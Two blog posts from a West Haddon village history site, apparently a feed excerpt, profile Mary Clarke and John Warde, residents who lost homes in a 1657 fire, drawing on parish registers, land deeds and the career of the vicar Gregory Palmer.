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Mary Clarke: a woman who left no trace https://westhaddonhistorysite.org/mary-clarke-a-woman-who-left-no-trace/ Mon, 07 Aug 2017 20:16:31 +0000 http://westhaddonhistorysite.org/?p=377 Continue reading "Mary Clarke: a woman who left no trace"

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All of the men who lost their homes in the fire have left some scrap of historical record behind them. The only woman named in the report left nothing at all – except for her appearance in that list. That is the only evidence we have that she ever lived.

She was probably a widow – very few single women at this period were householders. She may have been the widow of Abraham Clarke, a labourer who died in 1655, but burial records usually included the name of a spouse and in Abraham’s case there wasn’t one. William and Edward Clarke were both young farmers having babies baptised during the 1650s – maybe she was the mother of one (or both) of them. There are no burial entries for a Mary Clarke in the years following the fire, so maybe she went to live with a son or daughter in another village. The lady vanishes.

The earliest parish register that survives began in 1653. Any number of Mr Clarkes may have been buried in the years before that, but we can’t know who they were, what they did for a living, or whether they had a wife called Mary.

But the date of those first entries is significant. Following the Civil War, the Protectorate was set up in 1653 and Oliver Cromwell laid down arrangements for a more efficient recording of births, marriages and deaths.

Gregory Palmer had become Vicar of West Haddon in 1641, right at the start of the Civil War. He was a local lad – his family had been here since Queen Elizabeth’s day. And he remained Vicar here all through the Civil War, the Interregnum, the Restoration and the Glorious Revolution of 1688, finally dying in 1693. He had been Vicar for so long that when he died the parish clerk, in a state of shock, forgot to record his burial. (But the large chest tomb in the churchyard by the chancel has his name on it.)

Perhaps to survive so many changes in the policy of the church he had learnt, like the Vicar of Bray, to hedge his bets. Perhaps, to avoid accusations of Royalist sympathies, he had hidden, or even destroyed an earlier register which might have contained compromising comments.

So possibly it is Gregory Palmer we have to thank for our inability to pick up any clues about the life of Mary Clarke.

 

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John Warde: an unspeakable grief https://westhaddonhistorysite.org/john-warde-an-unspeakable-grief/ Thu, 03 Aug 2017 20:44:50 +0000 http://westhaddonhistorysite.org/?p=369 Continue reading "John Warde: an unspeakable grief"

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On the day of the fire, John Warde and his wife Elizabeth had buried their daughter Clement. And the following day they buried their son James.

It’s just possible that the children were casualties of the fire, but it seems unlikely that funerals would have been arranged quite so quickly in the aftermath of the disaster.

How old were Clement and James? The earliest entries in the baptisms register date from 1653 and their names don’t appear there, so they must at least have been older than four. Was it accident or illness that killed them? Why were they not buried on the same day? So many questions and no answers. But the loss of both children and their house and belongings all within a few days must have left John and Elizabeth reeling.

We know very little about the couple except that John was a small farmer. Records of various property transactions in the years running up to the fire show him selling a number of parcels of land in West Haddon. Around 1631 he had joined with his father Thomas in the sale of about 10 acres to Robert Miller for £23. Then in the 1640s he sold about 15 acres to Edward Clarke – but we don’t know how much money changed hands there – the purchase was simply mentioned in Edward’s will in 1649.

In 1650 John sold a house with a little yard and one bay of his barn to his neighbour Mark Bonner, for £17. And the following year he sold a close of pasture with Sandy Lane to the East and Nathaniel Brabson’s close to the south. (Subsequent deeds in the bundle suggest that the pasture was behind the houses on the corner of Northampton Road – aka Sandy Lane – and High St.) He sold it, presumably for grazing, to Samuel Newman the butcher, for £24. The following year Samuel Newman sold the same close to Thomas Kirtland, for £28. There must be another story there…

There is no evidence to suggest that John and Elizabeth were still living in the village in the years following the fire. Did they move away to make a fresh start and try, at least, to put the terrible memories of 1657 behind them?

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